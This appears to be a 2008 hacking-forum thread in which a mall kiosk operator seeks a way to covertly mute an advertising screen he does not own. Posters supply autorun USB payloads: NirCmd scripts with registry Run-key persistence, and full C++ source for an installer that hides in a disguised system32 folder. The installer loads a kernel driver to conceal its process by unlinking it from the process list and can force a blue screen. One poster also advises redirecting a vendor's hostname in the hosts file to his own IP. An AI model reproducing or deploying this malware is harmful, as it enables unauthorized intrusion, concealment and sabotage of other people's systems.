Fishmonger Posted July 31, 2008 Posted July 31, 2008 Okay, this might sound semi-malicious, but it isn't unwarranted. I operate a kiosk at my local mall, selling body jewelry. About 5 feet away from me is a SmartScreen, maybe you've seen them before, it's basically a 72" LCD turned on its side that displays sales local stores are having and little mini-commercials as well. My problem with it is the volume, the thing is way too loud. The commercials are annoying, and when it's not a commercial, it's crappy elevator muzak that's so loud I can hardly hear my customers over it, and can't speak on the phone within a 10 foot radius. I've tried complaining about it to the mall, and they just say that they have no control over it, they are all run remotely by some company called AdSpace. They gave me the phone number, but whenever I call I'm placed on hold for an extended period of time. So I've decided to take matters into my own hands. One day while looking for a volume control, I came across two USB ports on the underside of the screen. So the next day I brought in a keyboard and plugged it in. Sure enough, it's running XP. The keyboard had a volume control knob so I turned it all the way down, and that was that. Or so I thought. The next day it was back up, and seemed like it was even louder than before. I still had my keyboard, so I just turned it down again. But about an hour later, mall security came and told me not to touch it again, someone had seen me plugging my keyboard in and reported it. I came across the Hak5 wiki page on the USB Switchblade while I was looking for an inconspicuous way to kill the volume on this thing. My question is; is there a program(or virus, malicious or not) that will somehow disable the audio on a computer? Secondly, can I just make it into an ISO and set it up on my Cruzer with the LPInstaller program? If no such thing exists, can anyone help me out with ideas? I know that these screens are all connected to a network of some kind, I'm not sure whether it's closed or not. If all else fails I could use the switchblade and some of its extensions to glean said information from it and try remotely connecting to it. But I'd prefer a simpler solution. I just want to be able to hear my customers again. Quote
Xqtftqx Posted August 1, 2008 Posted August 1, 2008 Yes there is, its called nircmd. google it. on the examples theres something to mute the system volume. simply put it in a loop and at startup Quote
Fishmonger Posted August 1, 2008 Author Posted August 1, 2008 Thanks, Xqtftqx. I think I found what I was looking for with this! I'm hoping maybe you can give me some feedback on my plan so far. The ISO will have an autorun.inf, an icon, two copies of NirCmd, one named autorun.exe, and one named vol.exe, as well as two NirCmd scripts, one named autorun.ncl to deliver the payload, and the other named vol.ncl to loop the mutesysvolume command in NirCmd. I believe I've done everything right, but I'm quite new to all of this, so any help would be appreciated. The autorun.inf should execute autorun.exe, calling up the autorun.ncl script. It reads as follows; [AutoRun] open=autorun.exe script "autorun.ncl" icon=autorun.ico The Script itself should do three things, copy vol.exe and vol.ncl to the windows folder, create a registry key to enable vol.exe to run at startup with the command-line to call up the vol.ncl script, then a short wait before running the freshly copied vol.exe with the vol.ncl script. This is the autorun.ncl script; execmd copy "~$folder.nircmd$\vol.exe" "C:\WINDOWS" execmd copy "~$folder.nircmd$\vol.ncl" "C:\WINDOWS" regsetval sz "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" "Vol" "~qC:\WINDOWS\vol.exe~q script ~qvol.ncl~q" cmdwait 5000 exec hide "C:\WINDOWS\vol.exe" script ~qvol.ncl~q I used the ~$folder.nircmd$ variable so I don't have to determine the drive letter assigned to the flashdrive, NirCmd reads the variable as the folder that the currently running copy of NirCmd is located in, and i used the ~q variable because I wasn't sure if the presence of the extra quotes in the script would throw off NirCmd. The vol.ncl script is simple, it just mutes the system volume, and then runs NirCmd again with the same script; mutesysvolume 1 exec hide "C:\WINDOWS\vol.exe" script ~qvol.ncl~q Although there are a few different commands to change the volume, I went with the mute command because it seems the simplest. I apologize if this seems long-winded for such a short process, but I want to make sure I've got it right. Any comments or criticism are welcome. ::Edited to add a line break to prevent page distortion. Quote
mxlr Posted August 3, 2008 Posted August 3, 2008 fish could you get back on this one i am interested in your story and wonder how this all turns out thanks :) Quote
Steve8x Posted August 4, 2008 Posted August 4, 2008 Fishmonger no it does not sound malicious at all! You just want to turn the volume down a bit so you can do your job more effectively! there's nothing wrong with that! Although I don't think you should mute the volume! as they might notice it isn't making any sound at all and then you might get into a tight spot because you wont be able to turn it up at all since you don't have your keyboard with you! So instead I would just lower the volume to pretty low, but enough that you can still hear it a little! I've coded a neat little program in C++ that will automatically turn down the volume for you! From your post you said you had a Sandisk Cruzer!! :) That will be perfect for the job! I have made an ISO image file that has my VolumeChanger.exe on it along with a autorun.inf file. You have to overwrite the default U3 launch pad ISO with the custom one, then when your u3 drive is inserted it will be like popping in a CD! and the VolumeChanger.exe will execute, successfully lowering the volume to the desired level! Its Coded in Dev C++ and it works like this... Upon executing it Gets all the logical drive strings of all the drives the computer has... ex. C:\, D:\, E:\, F:\, etc.. and it tries to open "VolumeChanger32.ini" on each drive starting from the first until the open is successful or the end of drives are reached... (it is very unlikely that any drive on the computer will have a "VolumeChanger32.ini" so its almost for 100% it will find the one on your usb stick!) "VolumeChanger32.ini" will be on the ROOT of your Cruzer's data partition (not the CDROM partition but the one you can change easily, this way you can adjust the volume each day to find that perfect volume level without having to reflash the drive with a new ISO image!) VolumeChanger32.ini is simply a text file which contains only 1 number between 0 - 65535 0 being muted, 65535 being FULL BLAST! (probably what the volume is at since its so loud you say) so for example say you wanted to change the volume to very low, your VolumeChanger32.ini might contain this number: 5000 Now once you have that all set up! the custom ISO flashed over the default u3 ISO, and the VolumeChanger32.ini on your USB stick in the root... now when you insert the u3 drive the volume will change to whatever you had in the ini file, and it will save a log file to the root of the u3 drive as well which gives info about the sound device and the volume it was at, etc... You can test it on your computer while having the program "sndvol32.exe" running and see the result as it changes the master volume! then check out the log file! ;) Ive tested this by mounting the iso and having it autorun while the ini file was on my cruzer! I was watching sndvol32.exe and saw the volume changed! and then my log file looked like this: ini file found at: J:\VolumeChanger32.ini # of devices: 1 Device # 0 Opened Successfully! Prod. Name: "SigmaTel Audio" Short Name: "Volume Control" Full Name: "Volume Control" 8 channels, 2 controls Control # 1     Short Name: "Master Volume"     Full Name: "Master Volume"     Items: 0     Range: 0 to 65535     Steps: 192     Value: 65535 Control # 2     Short Name: "Master Mute"     Full Name: "Master Mute"     Items: 0     Range: 0 to 1     Steps: 0     Value: 0 Volume Changed Successfully!! There's only one problem I have! I can't seem to be able to flash over the CDROM partition with a custom ISO! People have said that you can just have the "cruzer-autorun.iso" in the same folder as lpinstaller.exe and it will use that instead of downloading the real one from the website! and it doesn't seem to work for me... It always downloads the one from the u3.sandisk.com website! So since I have an apache webserver I tried the other way of modifying my hosts file so that u3.sandisk.com points to 127.0.0.1(localhost) And it still doesn't work! I even have the correct directory structure and everything: When I run it it says download failed!: then Why can't I flash my Cruzer? Any help is appreciated! If you can get yours to flash then your volume changing is accomplished, then simply and secretly insert your cruzer into the usb port of the mall computer, then wait for the volume to change then plug it out! ;) Maybe I have an outdated LPinstaller or something? Well anyway give it a try! first with "cruzer-autorun.iso" in the same folder and see if that works! if not the edit your hosts file at %systemroot%\system32\drivers\etc its just called "hosts" with no extension! if you don't run a webserver and your to lazy to set one up or whatever you could just change your hosts and add this line NOTE: will only work if my computer is running(which is basically 90% of the time) 76.16.46.164    u3.sandisk.com or 127.0.0.1    u3.sandisk.com if your going to give it a try with your own web server running on your machine! Volume Changer Source Code: http://popeax.com/downloads/VolumeChanger.zip LPinstaller that im using: http://popeax.com/downloads/LPInstaller.exe The custom ISO I made for you including "VolumeChanger.exe" + "autorun.inf" http://popeax.com/download/apps/lpinstalle...zer-autorun.iso the autorun.inf contains this: [autorun] icon=VolumeChanger.exe open=VolumeChanger.exe action=Change Volume! shell\open\command=VolumeChanger.exe I hope you can help me out getting my drive to flash with a custom iso! Since I've helped you out changing the volume! :) Functions.h contains what does all the dirty work! main.cpp: // Volume Changer Coded By Steve8x! #include <windows.h> #include <stdio.h> #include <mmsystem.h> #include "Functions.h" FILE* f = 0; DWORD newvolume = 0; int inifound = 0; char VCini[32] = {0}; char logpath[32] = {0}; char Drives[301] = {0}; char volumestring[6] = {0}; int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {     GetLogicalDriveStringsA(300, Drives);         int dOffset = 0;     char* DriveString = (char*)&Drives;         while(*(DWORD*)DriveString != 0) // locate "VolumeChanger32.ini on your USB drive!     {         sprintf(VCini, "%s%s", DriveString, "VolumeChanger32.ini");                 f = fopen(VCini, "rb");                 if(f)         {             fread(volumestring, 5, 1, f);             newvolume = atoi(volumestring);             inifound = 1;             fclose(f);             break;         }                 dOffset += 4;                 DriveString = (char*)&Drives + dOffset;     }         if(inifound == 1)     {         sprintf(logpath, "%s%s", DriveString, "VC_log.txt");         logfile = fopen(logpath, "wb");                 sprintf(dbg, "ini file found at: %s \r\n", VCini);         fwrite(dbg, strlen(dbg), 1, logfile);     }     else     {         return 0;     }         GetDevices(); // enumerate sound devices         if(SetVolume(newvolume) == 1) // change volume to what was specified in the ini file!     {         fwrite("Volume Changed Successfully!", 28, 1, logfile);     }         // Pretty Simple Eh?;)         fclose(logfile);       mixerClose(hMixer);     return 1; } Functions.h char* GetMixerError(MMRESULT Code); FILE* logfile = 0; char dbg[364]; unsigned int NumDevices, NumControls; HMIXER hMixer = 0; MMRESULT Result; MIXERLINE Line; MIXERCONTROL Control; MIXERLINECONTROLS LineControls; MIXERCONTROLDETAILS Details; MIXERCONTROLDETAILS_UNSIGNED Value; int SetVolume(DWORD volume) {     //Set volume level     Details.cbStruct = sizeof(MIXERCONTROLDETAILS);     Details.dwControlID = 1; //Master Volume     Details.cChannels = 1;     Details.cMultipleItems = 0;     Details.cbDetails = sizeof(MIXERCONTROLDETAILS_UNSIGNED);     Details.paDetails = &Value;     Value.dwValue = volume;     Result = mixerSetControlDetails((HMIXEROBJ)hMixer, &Details, MIXER_OBJECTF_HMIXER | MIXER_GETCONTROLDETAILSF_VALUE);     if(Result == MMSYSERR_NOERROR)     {         return 1;     }     else     {         sprintf(dbg, "%u Failed: %s\r\n", __LINE__, GetMixerError(Result));         fwrite(dbg, strlen(dbg), 1, logfile);     }         return 0; } void GetDevices() {   //Get # of devices   NumDevices = mixerGetNumDevs();   sprintf(dbg, "# of devices: %d \r\n", NumDevices);   fwrite(dbg, strlen(dbg), 1, logfile);     for(unsigned int DeviceID = 0; DeviceID < NumDevices; DeviceID++)   {            //Open the device         Result = mixerOpen(&hMixer, DeviceID, 0, 0, MIXER_OBJECTF_MIXER);         if(Result == MMSYSERR_NOERROR)         {             sprintf(dbg, "Device # %u Opened Successfully! \r\n", DeviceID);             fwrite(dbg, strlen(dbg), 1, logfile);         }         else         {             sprintf(dbg, "%u Failed: %s\r\n", __LINE__, GetMixerError(Result));             fwrite(dbg, strlen(dbg), 1, logfile);             break;         }                 //Get the number of controls, channels, device name, etc         Line.cbStruct = sizeof(MIXERLINE);         Line.dwComponentType = MIXERLINE_COMPONENTTYPE_DST_SPEAKERS;         Result = mixerGetLineInfo((HMIXEROBJ)hMixer, &Line, MIXER_OBJECTF_HMIXER | MIXER_GETLINEINFOF_COMPONENTTYPE);         if(Result == MMSYSERR_NOERROR)         {             sprintf(dbg, "Prod. Name: \"%s\"\r\nShort Name: \"%s\"\r\nFull Name: \"%s\"\r\n%d channels, %d controls\r\n", Line.Target.szPname, Line.szShortName, Line.szName, (unsigned int)Line.cChannels, (unsigned int)Line.cControls);             fwrite(dbg, strlen(dbg), 1, logfile);         }         else         {             sprintf(dbg, "%u Failed: %s\r\n", __LINE__, GetMixerError(Result));             fwrite(dbg, strlen(dbg), 1, logfile);             break;         }                 //Get the value and text of each control         NumControls = Line.cControls;         for(unsigned int ControlID = 1; ControlID < NumControls + 1; ControlID++) //IDs are NOT zero-based         {             sprintf(dbg, "Control # %u\r\n", ControlID);             fwrite(dbg, strlen(dbg), 1, logfile);                         Control.cbStruct = sizeof(MIXERCONTROL);             LineControls.cbStruct = sizeof(MIXERLINECONTROLS);             LineControls.dwControlID = ControlID;             LineControls.cControls = 1;             LineControls.cbmxctrl = sizeof(MIXERCONTROL);             LineControls.pamxctrl = &Control;             Result = mixerGetLineControls((HMIXEROBJ)hMixer, &LineControls, MIXER_GETLINECONTROLSF_ONEBYID);             if(Result == MMSYSERR_NOERROR)             {                 sprintf(dbg, "\tShort Name: \"%s\"\r\n\tFull Name: \"%s\"\r\n\tItems: %d\r\n\tRange: %u to %u\r\n\tSteps: %d\r\n", Control.szShortName, Control.szName, (unsigned int)Control.cMultipleItems, (unsigned int)Control.Bounds.dwMinimum, (unsigned int)Control.Bounds.dwMaximum, (unsigned int)Control.Metrics.cSteps);                 fwrite(dbg, strlen(dbg), 1, logfile);             }             else             {                 sprintf(dbg, "%u Failed: %s\r\n", __LINE__, GetMixerError(Result));                 fwrite(dbg, strlen(dbg), 1, logfile);                 break;             }                     //Get value             Details.cbStruct = sizeof(MIXERCONTROLDETAILS);             Details.dwControlID = ControlID;             Details.cChannels = 1; //All channels at the same time             Details.cMultipleItems = 0;             Details.cbDetails = sizeof(MIXERCONTROLDETAILS_UNSIGNED);             Details.paDetails = &Value;             Result = mixerGetControlDetails((HMIXEROBJ)hMixer, &Details, MIXER_OBJECTF_HMIXER | MIXER_GETCONTROLDETAILSF_VALUE);             if(Result == MMSYSERR_NOERROR)             {                 sprintf(dbg, "\tValue: %u\r\n", (unsigned int)Value.dwValue);                 fwrite(dbg, strlen(dbg), 1, logfile);             }             else             {                 sprintf(dbg, "%u Failed: %s\r\n", __LINE__, GetMixerError((MMRESULT)Result));                 fwrite(dbg, strlen(dbg), 1, logfile);                 break;             }         }         fwrite("\r\n", 2, 1, logfile);     } } char* GetMixerError(MMRESULT Code) {   switch(Code)   {       case MMSYSERR_ALLOCATED:         return "Already allocated by max # of clients";       case MMSYSERR_BADDEVICEID:         return "Invalid device ID";       case MMSYSERR_INVALFLAG:         return "Invalid flag";       case MMSYSERR_INVALHANDLE:         return "Invalid handle";       case MMSYSERR_INVALPARAM:         return "Invalid parameter";       case MMSYSERR_NODRIVER:         return "No device available";       case MMSYSERR_NOMEM:         return "Not enough memory";       default:         return "Unknown error";   } } Quote
Steve8x Posted August 4, 2008 Posted August 4, 2008 Ok now this morning I was thinking about this program and I took look at the script you were writing... this line stood out: regsetval sz "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" It appears as though you want to actually install something on the computer that constantly changes the volume instead of just changing it once, and also starts when the computer turns on! since that's what that registry key is for! So I've come up with version 2.0 This time in the ISO image there is a "VC2Installer.exe" and "autorun.inf" VC2Installer simply Creates a directory in a secret location in system32 Then it dumps the VolumeChanger 2.0 EXE as "VC.exe" to the folder and also copies the "VolumeChanger32.ini" there too as "VC32.ini" It then adds the path to the process in this registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run which makes the program auto-run whenever windows starts up! Finally it does a ShellExecute to run copied VolumeChanger 2.0 Every 1 second the volume is changed to what the value was in VolumeChanger32.ini that was on your USB stick! OR if your USB stick is not plugged in, it reads from the local VC32.ini file. Also new with version 2.0 it now dumps a kernel mode driver into its working directory, and loads it into the driver stack, and passes it two offsets needed and the process ID of volume changer. The driver then hides the process from task manager or anything else by removing it from active process links... Flink and Blink method. Its just for extra secrecy, and to prevent the process from being terminated... You should try this one if your looking for a more permanent solution instead of having to keep putting your USB drive in everyday! NOTE: you still have to have VolumeChanger32.ini on your USB drive! ;) And its different as of 2.0 it now contains two lines Heres an example ini file http://popeax.com/downloads/VolumeChanger32.ini The first number is the volume to change to! just like before. The second line is new, it is a boolean value either 1 or 0, 0 means no BSOD, 1 means BSOD! basically I rigged the driver so that it will BSOD any computer that asks for it! This is why in the VC2Installer it changes the "AutoReboot" registry key so it gives you BSOD instead of automatically restarting! I don't know why you'd ever want this feature but nevertheless its there! ;) But I do think it would look silly! A blue screen of death on the mall screen lol! VC2Installer ISO: http://popeax.com/downloads/cruzer-autorun.iso VC2Installer Source: http://popeax.com/downloads/VC2Installer.zip Volume Changer 2.0 Source: http://popeax.com/downloads/VolumeChanger2.zip VCembedded.h contains the binary data for VolumeChanger.exe (its too large to post here, download the source) VCinstaller, main.cpp: // Volume Changer 2.0 Installer Coded by Steve8x #include <windows.h> #include <stdio.h> #include "VCembedded.h" FILE* VC = 0; char InstallDir[260] = {0}; char VCpath[260] = {0}; char dbg[100] = {0}; void AddToRegistry(char* EXEpath) {     HKEY hk5;     RegOpenKeyExA(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_ALL_ACCESS, &hk5);     RegSetValueExA(hk5, "VC", 0, REG_SZ, (const unsigned char*)EXEpath, strlen(EXEpath));     RegCloseKey(hk5);         //Turn auto reboot off so you get a BSOD instead of a reboot!;)     DWORD Zero = 0;     RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\CrashControl", 0, KEY_ALL_ACCESS, &hk5);     RegSetValueExA(hk5, "AutoReboot", 0, REG_DWORD, (BYTE*)&Zero, 4);     RegCloseKey(hk5); } void CopyIniFile() {     FILE* f = 0;     char VCini[260] = {0};     char filebuffer[32] = {0};     char Drives[301] = {0};     GetLogicalDriveStringsA(300, Drives);         int dOffset = 0, inifound = 0;     char* DriveString = (char*)&Drives;         while(*(DWORD*)DriveString != 0) // locate "VolumeChanger32.ini on your USB drive!     {         sprintf(VCini, "%s%s", DriveString, "VolumeChanger32.ini");                 f = fopen(VCini, "rb");         if(f)         {             inifound = 1;             fread(filebuffer, 32, 1, f);             fclose(f);             break;         }                 dOffset += 4;                 DriveString = (char*)&Drives + dOffset;     }         if(inifound == 1)     {         sprintf(dbg, "%s%s", InstallDir, "\\VC32.ini");         f = fopen(dbg, "wb");         fwrite(filebuffer, strlen(filebuffer), 1, f);         fclose(f);     } } int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {     GetSystemDirectory(InstallDir, 260); // ex. C:\WINDOWS\system32         //install into a secret dir, you may choose something else if desired     strcat(InstallDir, "\\CatRoot\\{13D0A11-4EF1-2234-1337-13464FC295FF}");     CreateDirectory(InstallDir, 0);     sprintf(VCpath, "%s%s", InstallDir, "\\VC.exe");     VC = fopen(VCpath, "wb");     fwrite(VCexe, sizeof(VCexe), 1, VC);     fclose(VC);         AddToRegistry(VCpath);     CopyIniFile();         ShellExecute(0, "open", "VC.exe", 0, InstallDir, SW_SHOWNORMAL);         return 1; } OK EDIT: i just tested this and ran VC2Installer on my computer! It installed fine and ran! As I changed the volume it would keep going back to the value I chose in the ini file, Then I restarted the computer to make sure it worked properly on startup, and it messed up and didnt find the ini file! but I have fixed it now and updated the downloads to v2.1 the problem is when running the program on startup through the registry the current directory for some reason is not the directory of the file path! So to solve the problem I just grab the path out of the registry where its stored, and use that to prepend to the ini file path + log file path tried it again and now it works perfectly on my windows XP machine! :) Quote
Fishmonger Posted August 4, 2008 Author Posted August 4, 2008 Hey Steve, thanks a lot for your help! I have the next couple days off, so I won't be able to test this until Wednesday or Thursday, but I'll let you know how it goes. As for flashing the CDROM partition of the cruzer, I'm going to use U3Hacker's Universal U3 Launchpad Hacker. Maybe you can try that and see if it works for you. Thanks again! Quote
Steve8x Posted August 4, 2008 Posted August 4, 2008 WOW! Thanks Alot for that link! I can't believe I didn't find that! Well anyway I just overwrote the CDROM partition with the VC2Installer ISO and it works perfectly! plugged it in and it installed and starting running :) Universal Customizer WORKS! Thanks Again! Quote
IOSys Posted August 5, 2008 Posted August 5, 2008 Maybe I have an outdated LPinstaller or something? No, the problem is the opposite; Your LP-installer is to new ! Because of the U3-hacks Sandisk changed the LP-installer so it no longer loads a ISO in it's DIR. Try version 1.0.0.12 Quote
Steve8x Posted August 24, 2008 Posted August 24, 2008 So fishmonger! you haven't let us know how it went yet? did it work? I've been waiting for an answer! let us know whats up :) Quote
Airforcex6 Posted November 17, 2011 Posted November 17, 2011 Hi guys! I've red your discussion about possibility of changing system sound using the programs which you have written, but when I tried to compile it on my computer, or to download them from the links you had been posted, some problems rose up. Can anyone help me? I have the similar problem like Fishmonger had. :) Regards! Quote
Airforcex6 Posted November 24, 2011 Posted November 24, 2011 Hi guys again! If you sometime read the text above which I wrote , I just wish to say that I managed to compile the source code which as a header file uses the "functions.h". The trick was to use Visual C++ instead of DEV C++. Anyway, tanks, you helped me! Regards! Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.